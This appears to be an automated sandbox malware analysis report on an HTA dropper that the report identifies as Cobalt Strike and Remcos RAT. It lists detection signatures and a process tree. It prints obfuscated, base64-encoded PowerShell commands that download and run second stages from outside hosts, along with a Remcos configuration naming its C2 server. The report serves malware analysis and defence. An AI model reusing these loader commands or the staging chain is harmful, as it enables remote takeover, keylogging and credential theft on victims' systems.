Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta

Overview

General Information

Sample name:greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta
Analysis ID:1574254
MD5:fccab384cf7d38618313385c0e22638b
SHA1:6e0efbb76a4d4b39a82b7d84393f399ea431b07e
SHA256:fc357d0488d2be1a5a49893d842e24d303250346dad592f6b1c8a9511edc15d2
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7280 cmdline: mshta.exe "C:\Users\user\Desktop\greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7384 cmdline: "C:\Windows\system32\cmd.exe" "/C POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7436 cmdline: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 7572 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1wf2prhw\1wf2prhw.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 7592 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE1B0.tmp" "c:\Users\user\AppData\Local\Temp\1wf2prhw\CSCC38D34038713434CB5EBD437745683DE.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 7644 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 7696 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 7704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • CasPol.exe (PID: 8136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 2916 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\aacvjnbswp" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 4192 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\lciocgmukyzvv" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 2504 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\lciocgmukyzvv" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
              • CasPol.exe (PID: 6372 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\nwvgdqxnygriykln" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["submarrine.duckdns.org:6946:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GH3PRL", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
      SourceRuleDescriptionAuthorStrings
      0000000C.00000002.4186207219.000000000244F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              0000000C.00000002.4180683046.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6b6f8:$a1: Remcos restarted by watchdog!
              • 0x6bc70:$a3: %02i:%02i:%02i:%03i
              Click to see the 21 entries
              SourceRuleDescriptionAuthorStrings
              12.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                12.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  12.2.CasPol.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    12.2.CasPol.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6b6f8:$a1: Remcos restarted by watchdog!
                    • 0x6bc70:$a3: %02i:%02i:%02i:%03i
                    12.2.CasPol.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x65994:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x65a04:$str_b2: Executing file:
                    • 0x6683c:$str_b3: GetDirectListeningPort
                    • 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x66380:$str_b7: \update.vbs
                    • 0x65a2c:$str_b9: Downloaded file:
                    • 0x65a18:$str_b10: Downloading file:
                    • 0x65abc:$str_b12: Failed to upload file:
                    • 0x66804:$str_b13: StartForward
                    • 0x66824:$str_b14: StopForward
                    • 0x662d8:$str_b15: fso.DeleteFile "
                    • 0x6626c:$str_b16: On Error Resume Next
                    • 0x66308:$str_b17: fso.DeleteFolder "
                    • 0x65aac:$str_b18: Uploaded file:
                    • 0x65a6c:$str_b19: Unable to delete:
                    • 0x662a0:$str_b20: while fso.FileExists("
                    • 0x65f49:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 7 entries
                    SourceRuleDescriptionAuthorStrings
                    amsi32_7696.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                      amsi32_7696.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywgJ0Nhc1BvbCcsICckYmlvZ3JhcGhlZXMnLCAnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnJGJpb2dyYXBoZWVzJywnMScsJyRiaW9ncmFwaGVlcycpKTs=';$spinispicule = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($verilus));Invoke-Expression $spinispicule, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $verilus = 'JGFwb3N0b2xpY25lc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskdmlicm9tZXRlcnMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRzYW5nYXBlbnVtID0gJHZpYnJvbWV0ZXJzLkRvd25sb2FkRGF0YSgkYXBvc3RvbGljbmVzcyk7JGhvcmlzbWFzY29wZSA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRzYW5nYXBlbnVtKTskSmFuaW5lID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR0cmlicm9tc2Fsb2wgPSAnPDxCQVNFNjRfRU5EPj4nOyRBcmFicyA9ICRob3Jpc21hc2NvcGUuSW5kZXhPZigkSmFuaW5lKTskcGx1cmlzcGlyYWwgPSAkaG9yaXNtYXNjb3BlLkluZGV4T2YoJHRyaWJyb21zYWxvbCk7JEFyYWJzIC1nZSAwIC1hbmQgJHBsdXJpc3BpcmFsIC1ndCAkQXJhYnM7JEFyYWJzICs9ICRKYW5pbmUuTGVuZ3RoOyRkZWNlcm5tZW50ID0gJHBsdXJpc3BpcmFsIC0gJEFyYWJzOyRhZmlyZSA9ICRob3Jpc21hc2NvcGUuU3Vic3RyaW5nKCRBcmFicywgJGRlY2Vybm1lbnQpOyR1bmRyZXNzZWQgPSAtam9pbiAoJGFmaXJlLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRhZmlyZS5MZW5ndGgpXTskR2FzdG9uID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5kcmVzc2VkKTskY3V0aXRlcmVicmEgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRHYXN0b24pOyRhbGxhbnRvaWRlYSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRhbGxhbnRvaWRlYS5JbnZva2UoJG51bGwsIEAoJzAvdnlpZEIvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRiaW9ncmFwaGVlcycsICckYmlvZ3JhcGhlZXMnLCAn
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebeautifulpictueforentirelifekidsgivenme.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: POwErsHELL -EX ByPass -NoP -w 1 -c DeviCECREDenTIalDePlOyMENT.eXE ; INvOke-ExPressiON($(INvOKE-expReSsIon('[SYSTeM.teXt.EncodInG]'+[ChaR]58+[ChaR]0X3a+'UTF8.GEtStRInG([SYstEm.cONVErT]'+[cHaR]0x3a+[chaR]58+'fROMBAse64StrINg('+[chAr]34+'JHhEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJFcmRFZkluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vbi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERRSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUURsTWx0WmRDSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRG1oSUdKc014ZkMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDdmtnaEopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlNyZ3BDamUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1Fc1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZUcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeEQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8yMy45NS4yMzUuMjkvOTAvdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWViYWNrd2l0aG5ldy50SUYiLCIkRW52OkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIiwwLDApO3N0YVJ0LXNMRWVwKDMpO0lOdk9rRS1FeFByZVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcdmVyeW5pY2ViZWF1dGlmdWxwaWN0dWVmb3JlbnRpcmVsaWZla2lkc2dpdmVubWUudmJTIg=='+[CHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7436, ParentProcessName: powershell.exe, 